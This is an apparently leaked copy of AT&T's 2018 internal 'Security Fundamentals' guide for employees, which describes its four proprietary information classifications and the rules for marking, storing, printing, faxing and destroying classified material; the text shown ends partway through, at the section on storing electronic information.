0% found this document useful (0 votes)

8 views

Security Fundamentals

Uploaded by

Andre Hiroshi Nishimi

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

8 views

Security Fundamentals

Uploaded by

Andre Hiroshi Nishimi

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 39

Security Fundamentals for AT&T Employees — Issue Date: April 23, 2018 (version 5.

Security Fundamentals
for AT&T Employees

Issue Date: April 23, 2018

P a g e |1
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Table of Contents
Document Overview_______________________________________________________________________________ 3
Introduction _____________________________________________________________________________________________ 3
What’s NEW! ______________________________________________________________________________________ 3
Document Structure ____________________________________________________________________________________ 3
Background ______________________________________________________________________________________________ 3
Source Standards _______________________________________________________________________________________ 3
Short Summary ___________________________________________________________________________________ 4
AT&T Information: Classification and Protection _________________________________________________ 4
AT&T Information: High Level Policy and Requirements ________________________________________ 5
Customer Data: Categorization and Protection ____________________________________________________ 5
AT&T Information: Classification and Protection ________________________________________________________ 6
Overview _________________________________________________________________________________________________ 6
Information Custodian _________________________________________________________________________________ 6
Information Classifications ____________________________________________________________________________ 7
Information Classification Markings _________________________________________________________________ 7
Handling Proprietary Information ___________________________________________________________________ 8
AT&T Proprietary (Internal Use Only) Information _________________________________ 8
“Internal Use Only” Printed Material ________________________________________________ 9
AT&T Proprietary (Restricted) ___________________________________________________ 9
“Restricted” Printed Material _____________________________________________________ 10
AT&T Proprietary (Secure Restricted) ___________________________________________ 10
“Secure Restricted” Printed Material _______________________________________________ 11
AT&T Proprietary (Sensitive Personal Information) ________________________________ 11
“Sensitive Personal Information” Printed Material _____________________________________ 14
Transmitting Electronic Information _____________________________________________ 19
AT&T Information: High Level Policy and Requirements ______________________________________________ 22
Overview _______________________________________________________________________________________________ 22
Responsibilities _______________________________________________________________________________________ 22
Compliance __________________________________________________________________ 22
Manager Responsibilities _______________________________________________________ 22
User Responsibilities ___________________________________________________________ 22
Security Training _____________________________________________________________ 22
Suspicious Activity ____________________________________________________________ 22
Reporting Security Flaws _______________________________________________________ 22
UserID and Password_________________________________________________________________________________ 23
AT&T Employee Userid — ATTUID _____________________________________________ 23
Password Rules _______________________________________________________________ 23
Unsuccessful Login Attempts ____________________________________________________ 23
Security on the AT&T Network _____________________________________________________________________ 24
Peer-to-Peer File Sharing _______________________________________________________ 24
Wireless Communication with Peripherals ________________________________________ 24
Email Security ________________________________________________________________ 24
Computer Viruses and Malicious Code ___________________________________________ 25
Security Analysis ______________________________________________________________ 25
Personal Computer Security ________________________________________________________________________ 27
Obtaining Files or Software _____________________________________________________ 27
Non-AT&T Owned Software, Hardware and Media _________________________________ 27
Teleconferencing ______________________________________________________________ 28
Third Party Access to AT&T Resources ___________________________________________ 29
Information Belonging or Pertaining to Customers of AT&T ______________________________________________ 29
Customer Data: Overview ____________________________________________________________________________ 29
Categorization of Customer Data ___________________________________________________________________ 29
Non-Sensitive "Customer Data" Printed Material ________________________________________________ 30
Sensitive "Customer Data" Printed Material ______________________________________________________ 31
Summary of Most Recent ASPR Updates (as of April 23, 2018) ____________________________________________ 34

P a g e |2
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)

Document Overview

Introduction
This document is a non-technical presentation and extract of security requirements in AT&T Security Policy and Requirements (ASPR) intended for
all AT&T employees, contractors and agents. The information provided in this document are excerpts only. If applicable, please refer to the ASPR
control for full content. It does not supersede official policies, standards or guidelines, but rather includes only information pertinent to every
AT&T employee regardless of level or technical competency. In many places within this document, the actual source documents have other
requirements that are more technical or targeted to specific sub-groups of employees.
Employees, contractors and agents responsible for the technical aspects of securing the AT&T networks or computing systems and applications
must comply with all information security policies published by Chief Security Office (CSO).
In addition to information security standards, employees need to be familiar with the rules for handling official company records published by the
Record and Information Management (RIM) organization.

What’s NEW!
After each publishing cycle—normally twice a year in spring and fall—this document is updated to reflect changes to ASPR. To add value and ease
of reading for our users, we have included a gold star as shown above.

Document Structure
1. Text boxes marked “HINT”, “KEY POINT” or “NOTE” do not come from the source documents listed but are added for clarity or to help
the reader to understand and to comply.
2. Gray bars below paragraph titles or within the text contain references back to the location in the source documents where the
appropriate text originates.

Background
Security is the responsibility of every AT&T employee, contractor and agent. All users must contribute to a safe workplace and all are custodians of
the information they work with even if they are not directly responsible for the security of the networks and devices that contain that information.
Most users work daily with information that AT&T must safeguard from unauthorized access.

Source Standards
The source standards for this document are found in the AT&T Security and Policy Requirements (ASPR) workspace on the eGRC platform. Select
the AT&T Security and Policy Requirements (ASPR) tab.

P a g e |3
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Short Summary
(For full detail review all content in the document)

AT&T Information: Classification and Protection

1. Protection requirements for data
a. Both information valuable to AT&T as well as to our customers, and information requiring protection by law, must be safeguarded
b. AT&T employees and contractors are custodians on behalf of AT&T and its customers to protect classified data and must know how
to protect it.
2. Proprietary data classified in 4 levels of sensitivity
Four levels of classification have been defined for AT&T Proprietary information and data:
Internal Use Only, Restricted, Secure Restricted and Sensitive Personal Information.
a. The four classifications require different levels of control for data storage, distribution, disclosure, and destruction.
b. If the classification is not known, the information must be treated as AT&T Proprietary (Internal Use Only) until the proper
classification is determined.
c. Specific labels and markings have been defined for each of the four (4) data classification levels and indicate the manner in which
documents and media are safeguarded.
d. All hard copy documents (including print outs, copies and faxes), removable media and online applications must display the
appropriate label.
3. Classification – AT&T Proprietary (Internal Use Only)
a. Information that is not intended for public disclosure
b. Information that is valuable to competitors or that can create unintended obligations
c. Internal Use Only information can be shared with others who have a business need (non-AT&T sharing requires a Non-Disclosure
Agreement).
4. Classification – AT&T Proprietary (Restricted)
a. Information that has a higher level of sensitivity
b. Information must be shared only among specifically identifiable persons with a clear business need to know.
c. Restricted information may be shared only with the explicit permission of the originator.
5. Classification – AT&T Proprietary (Secure Restricted)
a. Information with extreme strategic value that if disclosed is likely to damage AT&T's strategic relationships, its ability to launch a
technology/service as planned, or to lose advantage in the marketplace.
— and —
b. Requires an Officer of AT&T to determine the limitations of authorized disclosure (see Access Authorization AT&T Proprietary
(Secure Restricted) Information).
6. Classification – AT&T Proprietary (Sensitive Personal Information)
a. Information that requires a high degree of protection by law
— or —
b. Information that, if made public, could expose individuals to a risk of physical harm, fraud or identity theft
c. Examples of Sensitive Personal Information (SPI) include: bank account number, credit card number, driver’s license number, etc.
See page 13 for the complete list of data elements.
d. Storage, display, and distribution of SPI is subject to special security controls
7. Storing Electronic Information
a. AT&T proprietary information is subject to varied limitations and prohibitions on storage, copying, sharing, or distribution and may
require approvals depending on the level of data classification.
8. Transmission of electronic information
a. Transmitting AT&T electronic information is subject to restrictions and may require encryption depending on the level of data
classification.

P a g e |4
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Information: High Level Policy and Requirements
1. All AT&T employees and contractors must comply with the AT&T security standards as set out in the AT&T Security Policy and
Requirements (ASPR) set of documents that are located at http://cso.att.com/ASPRDatabase under the “AT&T Security and Policy
Requirements (ASPR)” tab.
2. All AT&T employees and contractors should annually complete security training as established by CSO and Corporate Compliance.
3. Managers are responsible for confirming business needs for subordinate access to AT&T resources and for ensuring subordinates comply
with ASPR requirements in general.
4. Any potential cyber intrusion, virus or suspicious network activity is to be reported immediately to the ACSIRT team at [email protected], 1-
866-466-2288 prompt 8 (US) or 1-908-234-3327 (International) or visit http://security.att.com/Security/IncidentReporting.html
5. All passwords used on AT&T systems must follow clearly defined set of ASPR requirements and should be managed securely using an
AT&T approved tool, e.g. PassWord Safe
6. Peer-to-Peer file sharing must not be used except where a specific set of requirements are met.
7. Any connections of wireless devices, such as personal digital assistants, cell phone wireless headsets, and computer wireless USB
adapters, to AT&T equipment or networks must be in compliance with ASPR.
8. Any storage of AT&T Proprietary information on electronic media or portable devices such as USB thumb drives, personal digital
assistants and digital cameras, must be controlled by AT&T personnel at all times and must be protected in accordance with ASPR.
9. Personnel using AT&T email systems to send AT&T Proprietary information must implement appropriate security controls as defined by
ASPR to protect electronic mail. In addition, email systems must not be used to send/receive chain letters, hoaxes or virus warnings or to
distribute executable files.
10. AT&T provides anti-virus software and instructions for protection of PCs and software in order to protect against viruses and other
malicious programs. PC desktop support can be contacted for assistance
11. All software used on AT&T owned and managed systems must be approved for use, be properly licensed, be obtained from trusted
sources and be confirmed to be free from viruses and malicious code. All software must be TSS-approved (http://tss.att.com/home.cfm)
unless a TSS exception has been approved prior to use.
12. AT&T owned hardware and software should always be used wherever possible. Any non-AT&T owned hardware and software used to
support AT&T must be authorized for use and must follow ASPR defined requirements.

Customer Data: Categorization and Protection

1. Customer Data refers to the data belonging to a customer of AT&T. It includes all information handled, stored or transmitted by AT&T
under contract or terms and conditions on behalf of the customer, but excludes all customer details. It includes user generated content.
2. Since the content of Customer Data is not normally known by AT&T, certainly not on a per item basis, the sensitivity for all Customer Data
that is part of a defined service or service subset must be considered the same.

P a g e |5
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Information: Classification and Protection
Overview
While working for AT&T, employees, contractors, suppliers and others learn information that AT&T regards as valuable or sensitive. Some of that
information is valuable because it gives AT&T advantages over competing businesses. Information may be regarded as sensitive because it is
personal information about customers or employees. Some information must be protected by law [e.g. US Federal Communications Commission
(FCC) regulations, US Health Insurance Portability and Accountability Act (HIPAA)] or to comply with external standards [e.g. Payment Card Industry
(PCI) Data Security Standards (DSS)]. Employees must know how to protect all this information as required by the company.
AT&T has defined four classifications for its business information along with rules for protecting that information in ASPR-0463: Information
Classification.

Information Custodian
Content Source: ASPR-0190: Custodian
KEY POINT: While AT&T officially and legally owns all its proprietary information, you are a custodian of that information. Both the well-being of
the company and your success on the job depend on how well you perform that role. This applies even to information you may gain by accident.

When an AT&T employee, contractor or agent receives and retains AT&T Proprietary information or customer data, he or she becomes a custodian
of that information and is responsible for protecting its confidentiality, integrity and availability according to the rules and regulations established
by the originator. At a minimum, the custodian is responsible for:
1. Complying with Records & Information Management (see ASPR-0191: Records and Information Management program guidelines on
retention and disposal of company records and information.
2. Providing proper safeguards for the information, including following guidelines in this practice for proper disposal.
3. In those cases where information must be printed from electronic media, the custodian must mark the printed information with the
appropriate classification.
4. Providing proper safeguards for processing equipment, information storage, backup, and recovery.
5. Providing a secure processing environment that can adequately protect the integrity, confidentiality, and availability of information.
6. Administering access requests to information properly authorized by the originator.
7. Using the information only for the purpose intended.
8. Maintaining the integrity, confidentiality, and availability of information accessed.
Being granted access to information does not imply or confer authority to grant other users access to that information beyond the normal
boundaries established for a given classification. This is true whether the information is electronically held, printed, hardcopy, manually prepared,
copied or transmitted.

P a g e |6
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Information Classifications
Content Source: ASPR-0463: Information Classification
Information classification is the framework for evaluating and protecting information and assets that contain information owned and used by the
AT&T companies. Information is categorized into four (4) classifications based on the sensitivity, legal requirement and competitive value of the
information.
All types of information are subject to these requirements, including, but not limited to:

 Data in production, test, or development environments,

 Archives,
 Backups,
 Downloaded data,
 Personal computer files,
 Emails
— and —
 Hard copy documents.
Furthermore, all information must be classified and protected according to this policy irrespective of the form it may take. In particular it includes
all types of hardcopy or printed material, electronic data, and when spoken or recorded in any way.
The four Information Classifications are:
1. AT&T Proprietary (Internal Use Only)
2. AT&T Proprietary (Restricted)
3. AT&T Proprietary (Secure Restricted)
4. AT&T Proprietary (Sensitive Personal Information).

Content Source: ASPR-0154: Default Classification

If the classification of information is unknown, the information must be treated as AT&T Proprietary (Internal Use Only) until the proper
classification is determined.

HINT: There’s a web page tool to help you determine the classification of information.

Information Classification Markings

Content Source: ASPR-0161, ASPR-0162, ASPR-0163, ASPR-0212, ASPR-1017
KEY POINT: Although there are four (4) classifications of proprietary information, there are more than four (4) markings with the choice of
marking depending on the use of the information and the media of presentation. When in doubt, these markings can all be found at
http://cso.att.com/IC/Markings.html and helpful FAQs on this are at http://cso.att.com/ASPR/InfoClassificationFAQ.html. There is no marking for
public information.

The labels and markings of documents and media influence the manner in which they are safeguarded. They alert information custodians of the
sensitivity of the documents, displays and media so that they can be appropriately secured to the respective requirements.
All hard copy documents (including print outs, copies and faxes), removable media and online applications must display the appropriate label
according to the highest classification of data contained. All company emails containing AT&T proprietary data must also be appropriately classified
and marked. (See ASPR-0209: Specific Markings – 2. E-mail Marking and Footer) Customer data is not required to display any form of AT&T
marking.
Unmarked information does not necessarily mean that the information should not be classified. A failure to classify or mark information does not:
 Authorize the release of the unmarked proprietary information.
 Decrease the requirements for safeguarding it from unauthorized use modification, destruction or disclosure.

AT&T Proprietary (Internal Use Only)

Not for use or disclosure outside the AT&T companies
except under written agreement

P a g e |7
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
AT&T Proprietary (Restricted)
Only for use by authorized individuals or any above-designated team(s)
within the AT&T companies and not for general distribution
— OR —
AT&T Proprietary (Restricted) — “Team”
Only for use by authorized individuals or any above-designated team(s)
within the AT&T companies and not for general distribution

AT&T Proprietary (Secure Restricted)

Only for use by authorized individuals as approved by an Officer of the AT&T Companies

AT&T Proprietary (Sensitive Personal Information)

Only for use by authorized individuals in accordance with requirements
for specific data categories predefined in Company security standards
for Information Classification and Protection
NOTE: If a “Team” is designated by the originator, the title of the marking would be revised to include the name of the identified team.

NOTE: ASPR permits local language markings in addition to English required markings. See ASPR-1017: Labels and Marking.

HINT: Here’s a copy and paste web page for the marking(s) you need.

Handling Proprietary Information

AT&T Proprietary (Internal Use Only) Information

Content Source: ASPR-0151: AT&T Proprietary (Internal Use Only)
Description
 Information that is proprietary and not intended for public disclosure, whose value could be diminished if publicly disclosed,
— or —
 Information that could be valuable to competitors or create unintended obligations or liabilities for AT&T if revealed outside the
company,
— or —
 Information that is intended for all employees or authorized contractors or is of such a nature that it is in the company’s interest to allow
any employee to determine if there is a business need to share it with any other employee.

Content Source: ASPR-0158: Access Authorization to AT&T Proprietary (Internal Use Only) Information
Internal Use Only information may be shared with any employee with a business need, and may be shared with any non-payroll worker (e.g.
contractor) who is authorized under a Non-Disclosure Agreement.
Modification of this information must be limited to authorized persons because of the potentially wide distribution of this information.

P a g e |8
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
“Internal Use Only” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity Inside AT&T controlled space Outside AT&T controlled space
Use and storage Should be kept away from visitors who have no Must be secured from unauthorized access.
right to see the information. Must be kept in the direct supervision of the custodian
Not necessary to keep hidden or physically or physically secured (e.g. desk, filing cabinet, safe, car
secured when unattended. trunk/boot, hotel room safe).
Must not leave the direct supervision of the custodian
when traveling on public transport (e.g. taxi trunk/boot,
bus hold/baggage storage, checked baggage on
airplane).
Printing & copying No specific restrictions. Must supervise the printer or copier with a person
authorized for the information.
Distribution No specific controls required when distribution Must use a sealed envelope whenever delivery is to a
is entirely within AT&T controlled space. location external to AT&T controlled space or whenever
the delivery utilizes non-AT&T personnel or service.
Fax Should include a fax transmittal sheet. Should include a fax transmittal sheet.
Must supervise fax machines that are located outside
AT&T controlled space with authorized personnel.
Destruction Must use special bins provided or shred. Must shred.

AT&T Proprietary (Restricted)

Content Source: ASPR-0152: AT&T Proprietary (Restricted)
Description
 Information that has a higher level of sensitivity and which the originator determines must be shared only among specifically identifiable
persons or team with a clear business need to know
— or —
 Information that requires a high degree of protection by law and loss or unauthorized disclosure could require notification by the
company to government agencies, individuals or law enforcement
— or —
 Information, that if revealed widely within the company could present an increased risk of compromising computer systems, fraud or
increased probability of disrupting the day to day operation of the business.

Content Source: ASPR-0159: Access Authorization to AT&T Proprietary (Restricted) Information

Restricted information may be shared only with the explicit permission of the originator.
The originator may designate a specific department, discrete group of employees or other “Team” within the title of the marking (e.g. “AT&T
Proprietary (Restricted) – Procurement Team”) to have access to information. Such a team may be an organization, a project group or other well
defined work group that may cross lines among more formal organizations. Team or group designations must be clear enough so that the team or
group members know who they are and understand the meaning well enough that they can keep the information away from unauthorized
persons. Ad hoc teams should not be used, however, project teams whose members are clearly defined may be. Where the valid members of the
team or group cannot be readily identified, the document must contain a paragraph describing how to determine the team membership.
If restricted information is to be shared among a designated group or team, members of the group or team may not pass on or discuss the
information with anyone other than “Team” members without the approval of the originator.
The right to read this information is limited to those individuals authorized by the data originator. Permission should be in writing. Email is
acceptable.
Modification of information designated for disclosure to a specific group or team must be limited to authorized persons who are members of the
group or team.

P a g e |9
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
“Restricted” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity Inside AT&T controlled space Outside AT&T controlled space
Use and storage Must be kept away from casual observers. Must be kept away from casual observers.
Must be kept in the direct supervision of the Must be kept in the direct supervision of the custodian or
custodian or physically secured (e.g. desk, filing physically secured (e.g. desk, filing cabinet, safe, car
cabinet, safe). trunk/boot, hotel room safe).
If the controlled space is only accessible to the Must not leave the direct supervision of the custodian
designated "Team", it is not necessary to keep when traveling on public transport (e.g. taxi trunk/boot,
hidden or physically secured when unattended. bus hold/baggage storage, checked baggage on airplane).
Printing & copying Must supervise the printer or copier Must supervise the printer or copier with a person
— or — authorized for the information.
Must print/copy in an office/area where access
is limited to authorized personnel.
Distribution Should be hand delivered by originator or Must use at least a single sealed envelope.
custodian.
Should, with the exception of (a) individual customer
Should use double envelopes with the inner information sent to that customer, and (b) individual
envelope marked "Private" when using AT&T employee information sent to that employee:
internal mail. I. Use double envelopes with the inner envelope
marked "Private"
The proprietary banner must not be visibly — and —
displayed on the envelopes. II. Be possible to track the package along its route
— and —
III. Be signed for upon delivery, whenever delivery
is to a location external to AT&T controlled
space or whenever the delivery utilizes non-
AT&T personnel or service.

The proprietary banner must not be visibly displayed on

the envelopes.
Fax Must verify receiving fax number. Must verify receiving fax number.
Should include a fax transmittal sheet. Should include a fax transmittal sheet.
Must supervise sending and receiving fax Must supervise fax machines that are located outside
machines with authorized personnel, or use fax AT&T controlled space with authorized personnel.
machines in offices/areas where access is
limited to authorized personnel.
Destruction Must use special bins provided or shred. Must shred.

AT&T Proprietary (Secure Restricted)

Content Source: ASPR-0211: AT&T Proprietary (Secure Restricted)
Description
 Information with extreme strategic value that if disclosed is likely to damage AT&T's strategic relationships, its ability to launch a
technology/service as planned, or to lose advantage in the marketplace
— and —
 Requires an Officer of AT&T (Level 6 or higher) to determine the limitations of authorized disclosure (see ASPR-0215: Access
Authorization to AT&T Proprietary (Secure Restricted) Information).

Content Source: ASPR-0215: Access Authorization to AT&T Proprietary (Secure Restricted) Information
AT&T Proprietary (Secure Restricted) information may only be shared with individuals who have been explicitly authorized.
Each individual requiring access to AT&T Proprietary (Secure Restricted) information must be authorized by an Officer of AT&T (level 6 or higher)
or a designated delegate of an Officer of AT&T (level 6 or higher) prior to being permitted such access. Any delegation of responsibility must be to
a named individual in writing (email is acceptable). Parameters for authorizing individuals must be established as part of any delegation (e.g. to

P a g e | 10
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
include only additional AT&T members). Any change to the parameters that have been delegated (e.g. ability to add non-AT&T members) must
again be in writing (email is acceptable) from the Officer of AT&T (level 6 or higher).

“Secure Restricted” Printed Material

Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity Inside AT&T controlled space Outside AT&T controlled space
Use and storage Must be kept away from casual observers. Should never be taken outside AT&T controlled
Must be kept in the direct supervision of the custodian or space.
physically secured (e.g. desk, filing cabinet, safe). If there is an overriding business need then:
a. Must obtain, and retain, written approval from
an Officer of AT&T (Level 6 or higher).
b. Must be kept away from casual observers.
c. Must be kept in the direct supervision of the
custodian or physically secured (e.g. desk, filing
cabinet, safe, car trunk/boot, hotel room safe.
d. Must not leave the direct supervision of the
custodian when traveling on public transport
(e.g. taxi trunk/boot, bus hold/baggage storage,
checked baggage on airplane).
Printing & copying Must supervise the printer or copier Must not print/copy outside AT&T controlled space.
— or —
Must print/copy in an office/area where access is limited
to authorized personnel.
Distribution Should be hand delivered by the originator or custodian. Should never be taken outside AT&T controlled
space.

If hand delivery is not feasible then:

If there is an overriding business need then:
i. Approval must be obtained from an Officer of
AT&T (Level 6 or higher). i. Should hand deliver by the originator or
ii. Must use double envelopes with the inner custodian.
envelope marked "Private", and be possible to
If hand delivery is not feasible then:
track the package along its route, and be signed
for upon delivery. i. Approval must be obtained from an
iii. The proprietary banner must not be visibly Officer of AT&T (Level 6 or higher).
displayed on the envelopes. ii. Must use double envelopes with the inner
iv. Following the expected delivery timeframe the envelope marked "Private", and be
sender must confirm safe receipt. possible to track the package along its
route, and be signed for upon delivery.
iii. The proprietary banner must not be visibly
displayed on the envelopes.
iv. Following the expected delivery timeframe
the sender must confirm safe receipt.
Fax Must not be faxed. Must not be faxed.
Destruction Must shred. Must shred.

AT&T Proprietary (Sensitive Personal Information)

Content Source: ASPR-0153: AT&T Proprietary (Sensitive Personal Information)
Description
 Information that requires a high degree of protection by law and loss or unauthorized disclosure would require notification by the
company to government agencies, individuals or law enforcement
— or —
 Information that, if made public, could expose individuals to a risk of physical harm, fraud or identity theft.

KEY POINT: The specific data elements listed below must be classified and protected as AT&T Proprietary (Sensitive Personal Information).
Complete descriptions for these data elements can be found in ASPR-0206: Pre-Classified Data Elements.
P a g e | 11
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)

Content Source: ASPR-0206: Pre-Classified Data Elements

Table: Data Elements defined as AT&T Proprietary (Sensitive Personal Information)
Driver’s License Number Taxpayer Identification Number
U.S. Social Security Number (SSN) Nationally Issued Identification Number
State or Province-issued Identification Number Payment Card Number (Includes debit and pre-paid cards)
Payment Card Security Data Background Checks*
Bank Account Number Customer Authentication Credentials
Customer Authentication Number Hints Location Based Information (LBI)
Date of Birth: Biometric Data
An individual's full and complete DOB, i.e. including Month, Day and
Year. Excludes partial DOB where only Month and Day are used
without Year. This element contains two factors both of which must
be present and able to be associated with each other:

1. A full and complete DOB

— and —
2. The individual's identity, either explicitly or via a unique
identifier that can be linked to that individual.
Criminal History Racial or Ethnic Origin
(Subject to non-U.S. jurisdiction) (Subject to non-U.S. jurisdiction)
Trade Union Membership Information Related to an Individual’s Political Affiliation, Religious
(Subject to non-U.S. jurisdiction) Belief or Sexual Orientation
(Subject to non-U.S. jurisdiction)
U.S. Protected Health Information (PHI) Medical and Health Information
(Subject to non-U.S. jurisdiction)
Genetic Information*

*Note: Pre-existing data stores holding this data element have until 16th April 2019 to comply with all applicable AT&T Proprietary (Sensitive
Personal Information) requirements.

Table: Customer Privacy – The following “Privacy” related data elements have been pre-classified as follows when they apply to a customer.
Customer
Classification /
Data Element Description Information
Categorization
Type
Customer Web Information about what websites our customers visit and Customer AT&T Proprietary (Sensitive
Browsing History applications they use on our network (wireline and wireless Details Personal Information)
including Wi-Fi); this does not include browsing and activities
associated with customers' use of official AT&T corporate websites
or history captured at the network level prior to “processing” (e.g.
raw data streams not associated with a customer).
Customer Viewing Information about programs watched or recorded, games and Customer AT&T Proprietary (Sensitive
History applications used, etc. (e.g. DIRECTV® (DTV) Set Top Box viewing, Details Personal Information)
DIRECTV NOW® viewing)

Customer Including: Email, text messages, conference call recording, and Customer Data Sensitive Customer Data
“messaging” content voice mail call recording.

Excluding: “Messaging” between customers and AT&T in

conducting official AT&T corporate business. Any other data.

Note: Pre-existing data stores holding this data element (except

for customer email and customer text message) have until 16th

P a g e | 12
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Customer
Classification /
Data Element Description Information
Categorization
Type
April 2019 to comply with all applicable Sensitive Customer Data
requirements.

Metadata relating to For example: Email recipients address, text message recipients Customer Restricted Personal
customer “messaging” phone number, conference call attendees phone number, voice Details Information
(as defined above) mail recipients phone number.
Customer Telemetry Automated communications for monitoring by the customer Customer Data Sensitive Customer Data
Data (rather than AT&T). Including all data that is generated by our
customers' use of the Digital Life® service or any other IoT service
Customer Use that is used by the customer to monitor or control the service. For
example, video files.

Note: Pre-existing data stores holding this data element (except for
Digital Life data) have until 16th April 2019 to comply with all
applicable Sensitive Customer Data requirements.
Customer Telemetry Automated communications for monitoring by AT&T. Including all Customer Restricted Personal
Data data that is generated by our customers' use of the Digital Life® Details Information
service or any other IoT service that is used by AT&T to monitor or
AT&T Use control the service. For example, IoT temperature settings that
trigger automated AT&T notifications to the customer.
Customer Usage Information about usage for applications on our customers' Customer Restricted Personal
information for device devices transmitted on our network Details Information
resident applications
Customer Web Under normal operation. Customer Data Not pre-classified.
communications See ASPR-0579: Information
payload Belonging to a Customer of
AT&T.
Customer Use
Customer Web When captured as part of service analysis, e.g. Deep Packet Customer AT&T Proprietary (Sensitive
communications Inspection (DPI) data. See ASPR-0094: Data Capture and Testing. Details Personal Information)
payload
Note: Pre-existing data stores holding this data element have until
AT&T Use 16th April 2019 to comply with all applicable AT&T Proprietary
(Sensitive Personal Information) requirements.
Other customer Any data intended for use by the customer rather than AT&T. For Customer Data Not pre-classified.
generated content. example, video, calendar, contacts.
See ASPR-0579: Information
Belonging to a Customer of
AT&T.

Content Source: ASPR-0160: Access Authorization to AT&T Proprietary (Sensitive Personal Information)
AT&T Proprietary (Sensitive Personal Information) information may only be shared with the explicit permission of the originator.
The right to read or modify this information is limited to those individuals authorized by the data originator.

P a g e | 13
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
“Sensitive Personal Information” Printed Material
Content Source: ASPR-0170, ASPR-0171, ASPR-0172, ASPR-0173, ASPR-0174
Activity Inside AT&T controlled space Outside AT&T controlled space
Use and storage Must be kept away from casual observers. Should never be taken outside AT&T controlled
Must be kept in the direct supervision of the space.
custodian or physically secured (e.g. desk, filing If there is an overriding business need then:
cabinet, safe). a. Must obtain, and retain, written approval from
an Officer of AT&T (Level 6 or higher).
b. Must be kept away from casual observers.
c. Must be kept in the direct supervision of the
custodian or physically secured (e.g. desk, filing
cabinet, safe, car trunk/boot, hotel room safe.
d. Must not leave the direct supervision of the
custodian when traveling on public transport
(e.g. taxi trunk/boot, bus hold/baggage storage,
checked baggage on airplane).
Printing & copying Must supervise the printer or copier Should not print/copy outside AT&T controlled
— or — space.
Must print/copy in an office/area where access is If there is an overriding business need then:
limited to authorized personnel.
Must supervise the printer or copier with a person
authorized for the information.
Should mask or obscure AT&T Proprietary (Sensitive Should mask or obscure AT&T Proprietary (Sensitive
Personal Information) data elements from view Personal Information) data elements from view
unless required by the business process unless required by the business process
Distribution Should be hand delivered by the originator or Should not be distributed outside AT&T controlled
custodian. space except for mailing individual customer bills,
which include customer PINs, for use when
obtaining Customer Service via telephone.
If hand delivery is not feasible then:
I. Approval must be obtained from an
Executive Director (Level 4). In all other cases if there is an overriding business
II. Must use double envelopes with the inner need then:
envelope marked "Private", and be I. Should hand deliver by the originator or
possible to track the package along its custodian.
route, and be signed for upon delivery. If hand delivery is not feasible then
approval must be obtained from an
The proprietary banner must not be visibly displayed Executive Director (Level 4).
on the envelopes. II. Must use double envelopes with the inner
Following the expected delivery timeframe the envelope marked "Private", and be
sender must confirm safe receipt. possible to track the package along its
route, and be signed for upon delivery.
III. The proprietary banner must not be visibly
displayed on the envelopes.

P a g e | 14
AT&T Proprietary (Internal Use Only)
Not for use or disclosure outside the AT&T companies except under written agreement
Security Fundamentals for AT&T Employees — Issue Date April 23, 2018 (version 5.1)
Activity Inside AT&T controlled space Outside AT&T controlled space
Fax Should not be faxed. Should not be faxed.
If there is an overriding business need then: If there is an overriding business need then:
 Must obtain approval from an Executive  Must obtain approval from an Executive
Director. (Level 4). Approval must be Director. (Level 4). Approval must be
retained for a period of time consistent retained for a period of time consistent
with RIM (see ASPR-0191: Records and with RIM (see ASPR-0191: Records and
Information Management (RIM). Information Management (RIM).
 Must verify receiving fax number.  Must verify receiving fax number.
 Should include a fax transmittal  Should include a fax transmittal
statement. statement.
 Must only use fax machines that are  Must only use fax machines that are
supervised with authorized personnel, or supervised with authorized personnel, or
are located in offices/areas where access is are located in offices/areas where access
limited to authorized personnel, or is limited to authorized personnel, or
validated within a business process. validated within a business process.
Where faxing to a supervised machine, upon Where faxing to a supervised machine, upon
completion the sender must confirm safe receipt. completion the sender must confirm safe receipt.
Destruction Must shred. Must shred.

Storing Electronic Information

Content Source: ASPR-0176: Storage of Electronic Data
